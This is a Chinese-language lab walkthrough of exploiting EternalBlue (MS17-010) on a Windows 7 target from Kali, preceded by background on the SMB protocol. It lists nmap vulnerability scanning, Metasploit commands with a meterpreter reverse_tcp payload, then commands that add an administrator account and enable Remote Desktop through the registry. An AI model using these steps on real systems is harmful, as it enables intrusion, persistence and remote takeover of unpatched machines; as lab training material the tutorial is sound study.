免责声明:本文仅做技术交流与学习....
目录
一.前置知识
1.何为永恒之蓝?
2.什么是SMB协议?
3.SMB工作原理是什么?
二、实验环境
三、实验步骤
nmap扫描
msf一把梭哈
shell执行命令
远程连接
一.
二.
一.前置知识
1.何为永恒之蓝?
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、*等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2.什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
3.SMB工作原理是什么?
(1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。
(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。
(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。
(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。
二、实验环境
攻击机器:Kali
依赖工具:MSF、nmap
靶机:win7
三、实验步骤
Win7永恒之蓝漏洞步骤
nmap扫描
打开win7,发现密码都不知道。(然后用nmap扫描,看靶机是否存在漏洞,存在可利用漏洞进行操作。)
打开kali,进入终端,输入sudo su root进入管理员。
Ifconfig -->进行查询kali的ip地址。
nmap 网段à进行网段扫描,得到靶机的ip地址。
nmap –script=vuln 靶机的ip地址à得出靶机是否存在漏洞.
由此看到存在编号为:ms17_010的漏洞,所以接下来进行漏洞利用。
msf一把梭哈
msfconsole--->指令进入控制台。
search ms17_010 -->搜索漏洞编号。
use 0 -->进行爆破。
show options --->查看配置。
set RHOSTS 靶机ip地址 -->配置靶机的ip地址。
set payload windows/x64/meterpreter/reverse_tcp -->配置要攻击的系统。
exploit --->进行爆破。
-->显示meterpreter说明成功进入靶机。
shell执行命令
shell --->成功进入服务端。
net user 账号 密码 /add -->进行设置新用户的账号密码。
net localgroup administrators 账号 /add --->将建立的新账号列入管理员权限。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f -->输入此命令打开远程权限。
远程连接
至此
有两种方法,选择一种即可。
一.
自己电脑的搜索栏里搜索:远程桌面连接。
输入靶机的ip地址。(检查一下用户名是你刚刚自己新创建的。)
点击:连接。
输入刚刚创建的密码即可。
二.
再打开一个新新的终端àrdesktop 靶机ip地址 -->进行远程桌面。
远程桌面开启后,选择其它用户登录,输入刚才新创建的账号密码登录即可。